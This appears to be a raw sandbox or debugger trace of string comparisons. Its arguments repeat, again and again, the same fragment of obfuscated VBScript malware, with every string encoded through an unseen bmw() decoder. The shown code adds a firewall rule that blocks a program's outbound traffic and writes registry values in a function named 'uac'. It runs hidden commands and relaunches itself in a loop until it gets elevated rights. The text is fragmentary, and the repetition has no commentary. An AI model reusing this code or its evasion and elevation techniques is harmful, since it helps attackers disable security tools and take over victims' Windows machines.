= ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.026] wcsncmp (_String1="1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0223.026] wcsncmp (_String1=" & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.026] wcsncmp (_String1="& \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 25 [0223.026] wcsncmp (_String1=" \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.026] wcsncmp (_String1="\">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 